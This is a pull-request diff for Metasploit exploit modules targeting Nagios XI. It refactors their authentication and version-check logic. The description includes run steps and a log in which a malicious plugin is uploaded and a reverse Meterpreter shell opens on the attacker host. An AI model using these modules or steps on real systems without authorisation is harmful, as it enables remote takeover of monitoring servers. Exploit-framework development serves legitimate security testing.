+    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
+      nagios_version = '1.0.0'
     end
-
-    # check if the target is actually vulnerable
     @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    auth_result, err_msg = authenticate
+
+    case auth_result
+    when 1
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
+    end
+
     if @version < Rex::Version.new('5.6.6')
       return CheckCode::Appears
     end
@@ -266,6 +289,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    unless @auth_cookies.present?
+      login_result, err_msg = authenticate
+      case login_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
+    end
+
     @monitoring_plugins_url = normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')
     grab_plugins_nsp
     wfsdelay = datastore['WfsDelay']

--- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
-          'Reliability' => [] # fixing rubocop issues
+          'Reliability' => []
         }
       )
     )
@@ -112,83 +112,17 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def handle_unsigned_license(res_array, username, password, finish_install)
-    auth_cookies, nsp = res_array
-    sign_license_result = sign_license_agreement(auth_cookies, nsp)
-    if sign_license_result
-      return 5, 'Failed to sign license agreement'
-    end
-
-    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-    sleep 5
-    login_result, res_array = login_after_install_or_license(username, password, finish_install)
-    case login_result
-    when 1..4 # An error occurred, propagate the error message
-      return login_result, res_array[0]
-    when 5 # The Nagios XI license agreement still has not been signed
-      return 5, 'Failed to sign the license agreement.'
-    end
-
-    return login_result, res_array
-  end
-
-  def authenticate
-    login_result, res_array = nagios_xi_login(username, password, finish_install)
-    case login_result
-    when 1..3
-      return login_result, res_array[0]
-    when 4 # Nagios XI is not fully installed
-      install_result = install_nagios_xi(password)
-      if install_result
-        return install_result[0], install_result[1]
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..4 # An error occurred, propagate the error message
-        return login_result, res_array[0]
-      when 5 # The license agreement still needs to be signed
-        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-        return login_result, res_array unless (login_result == 0)
-      end
-    when 5
-      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-      return login_result, res_array unless (login_result == 0)
-    end
-
-    print_good('Successfully authenticated to Nagios XI.')
-
-    # Obtain the Nagios XI version
-    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
-
-    nagios_version = nagios_xi_version(res_array[0])
-    if nagios_version.nil?
-      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
-    end
-
-    print_status("Target is Nagios XI with version #{nagios_version}.")
-
-    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
-    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
-    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
-      nagios_version = '1.0.0'
-    end
-    @version = Rex::Version.new(nagios_version)
-
-    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
-  end
-
   def check
     # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
     # an array containing the http response body of a get request to index.php and the session cookies
-    auth_result, err_msg = authenticate
+    auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
 
     case auth_result
-    when 1
+    when AUTH_RESULTS[:connection_failed]
       return CheckCode::Unknown(err_msg)
-    when 2, 4, 5, 6
+    when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
       return CheckCode::Detected(err_msg)
-    when 3
+    when AUTH_RESULTS[:not_nagios_application]
       return CheckCode::Safe(err_msg)
     end
 
@@ -290,14 +224,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     unless @auth_cookies.present?
-      login_result, err_msg = authenticate
-      case login_result
-      when 1
-        fail_with(Failure::Disconnected, err_msg)
-      when 2, 4, 5, 6
-        fail_with(Failure::UnexpectedReply, err_msg)
-      when 3
-        fail_with(Failure::NotVulnerable, err_msg)
+      auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
+      case auth_result
+      when AUTH_RESULTS[:connection_failed]
+        return CheckCode::Unknown(err_msg)
+      when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
+        return CheckCode::Detected(err_msg)
+      when AUTH_RESULTS[:not_nagios_application]
+        return CheckCode::Safe(err_msg)
       end
     end
 

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -85,62 +85,85 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def check
-    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
-    # an array containing the http response body of a get request to index.php and the session cookies
+  def handle_unsigned_license(res_array, username, password, finish_install)
+    auth_cookies, nsp = res_array
+    sign_license_result = sign_license_agreement(auth_cookies, nsp)
+    if sign_license_result
+      return 5, 'Failed to sign license agreement'
+    end
+
+    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+    sleep 5
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The Nagios XI license agreement still has not been signed
+      return 5, 'Failed to sign the license agreement.'
+    end
+
+    return login_result, res_array
+  end
+
+  def authenticate
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
-    when 1..3 # An error occurred
-      return CheckCode::Unknown(res_array[0])
+    when 1..3
+      return login_result, res_array[0]
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
       if install_result
-        return CheckCode::Unknown(install_result[1])
+        return install_result[0], install_result[1]
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
-      when 1..3 # An error occurred
-        return CheckCode::Unknown(res_array[0])
-      when 4 # Nagios XI is still not fully installed
-        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The license agreement still needs to be signed
+        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+        return login_result, res_array unless (login_result == 0)
       end
+    when 5
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
     end
 
-    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
-    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
-    if login_result == 5 # the Nagios XI license agreement has not been signed
-      auth_cookies, nsp = res_array
-      sign_license_result = sign_license_agreement(auth_cookies, nsp)
-      if sign_license_result
-        return CheckCode::Unknown(sign_license_result[1])
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..3
-        return CheckCode::Unknown(res_array[0])
-      when 5 # the Nagios XI license agreement still has not been signed
-        return CheckCode::Detected('Failed to sign the license agreement.')
-      end
-    end
-
-    print_good('Successfully authenticated to Nagios XI')
+    print_good('Successfully authenticated to Nagios XI.')
 
     # Obtain the Nagios XI version
     @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
 
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
     end
 
-    print_status("Target is Nagios XI with version #{nagios_version}")
-    # check if the target is actually vulnerable
-    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
-      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    print_status("Target is Nagios XI with version #{nagios_version}.")
+
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
+      nagios_version = '1.0.0'
     end
     @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    auth_result, err_msg = nagios_xi_login(username, password, finish_install)
+    case auth_result
+    when 1
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
+    end
+
     if @version < Rex::Version.new('5.8.0')
       return CheckCode::Appears
     end
@@ -175,6 +198,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    unless @auth_cookies.present?
+      login_result, err_msg = authenticate
+      case login_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
+    end
+
     if @version < Rex::Version.new('5.3.0')
       fail_with(Failure::NoTarget, 'Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!')
     end

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -85,82 +85,16 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def handle_unsigned_license(res_array, username, password, finish_install)
-    auth_cookies, nsp = res_array
-    sign_license_result = sign_license_agreement(auth_cookies, nsp)
-    if sign_license_result
-      return 5, 'Failed to sign license agreement'
-    end
-
-    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-    sleep 5
-    login_result, res_array = login_after_install_or_license(username, password, finish_install)
-    case login_result
-    when 1..4 # An error occurred, propagate the error message
-      return login_result, res_array[0]
-    when 5 # The Nagios XI license agreement still has not been signed
-      return 5, 'Failed to sign the license agreement.'
-    end
-
-    return login_result, res_array
-  end
-
-  def authenticate
-    login_result, res_array = nagios_xi_login(username, password, finish_install)
-    case login_result
-    when 1..3
-      return login_result, res_array[0]
-    when 4 # Nagios XI is not fully installed
-      install_result = install_nagios_xi(password)
-      if install_result
-        return install_result[0], install_result[1]
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..4 # An error occurred, propagate the error message
-        return login_result, res_array[0]
-      when 5 # The license agreement still needs to be signed
-        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-        return login_result, res_array unless (login_result == 0)
-      end
-    when 5
-      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-      return login_result, res_array unless (login_result == 0)
-    end
-
-    print_good('Successfully authenticated to Nagios XI.')
-
-    # Obtain the Nagios XI version
-    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
-
-    nagios_version = nagios_xi_version(res_array[0])
-    if nagios_version.nil?
-      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
-    end
-
-    print_status("Target is Nagios XI with version #{nagios_version}.")
-
-    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
-    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
-    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
-      nagios_version = '1.0.0'
-    end
-    @version = Rex::Version.new(nagios_version)
-
-    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
-  end
-
   def check
     # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
     # an array containing the http response body of a get request to index.php and the session cookies
-    auth_result, err_msg = nagios_xi_login(username, password, finish_install)
+    auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
     case auth_result
-    when 1
+    when AUTH_RESULTS[:connection_failed]
       return CheckCode::Unknown(err_msg)
-    when 2, 4, 5, 6
+    when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
       return CheckCode::Detected(err_msg)
-    when 3
+    when AUTH_RESULTS[:not_nagios_application]
       return CheckCode::Safe(err_msg)
     end
 
@@ -199,14 +133,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     unless @auth_cookies.present?
-      login_result, err_msg = authenticate
-      case login_result
-      when 1
-        fail_with(Failure::Disconnected, err_msg)
-      when 2, 4, 5, 6
-        fail_with(Failure::UnexpectedReply, err_msg)
-      when 3
-        fail_with(Failure::NotVulnerable, err_msg)
+      auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
+      case auth_result
+      when AUTH_RESULTS[:connection_failed]
+        return CheckCode::Unknown(err_msg)
+      when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
+        return CheckCode::Detected(err_msg)
+      when AUTH_RESULTS[:not_nagios_application]
+        return CheckCode::Safe(err_msg)
       end
     end
 


### PR DESCRIPTION
Improving nagiosxi authenticated modules to work with even when autocheck is disabled. This Pull Request fixes #17606 and some improvements have been performed to the below nagios authenticated modules.

- modules\exploits\linux\http\nagios_xi_autodiscovery_webshell.rb
- modules\exploits\linux\http\nagios_xi_mibs_authenticated_rce.rb
- modules\exploits\linux\http\nagios_xi_plugins_check_plugin_authenticated_rce.rb
- modules\exploits\linux\http\nagios_xi_plugins_filename_authenticated_rce.rb

The improvements that are made for the above modules are

1. Moved authentication function to its own and called it in check and exploit when necessary.
2. Used the regex advised in [PR 17494](https://github.com/rapid7/metasploit-framework/pull/17494#discussion_r1097807544)
3. Refactor case statements to use accurate error codes, error messages, and Failure codes  

## Verification that the exploit runs when the autocheck is disabled.

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce`
- [x] `set RHOST <ip>`
- [x] `set PASSWORD <nagios password>`
- [x]  `set LHOST <ip>`
- [x]  `set autocheck false`
- [x]  `run`
- [x]  **Verify**

Here is the output

```
[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.6.5.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 192.168.64.11
[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.11:46570) at 2023-03-26 16:25:17 +0530
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter >
```

Here is the previous output

```
[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) >
```

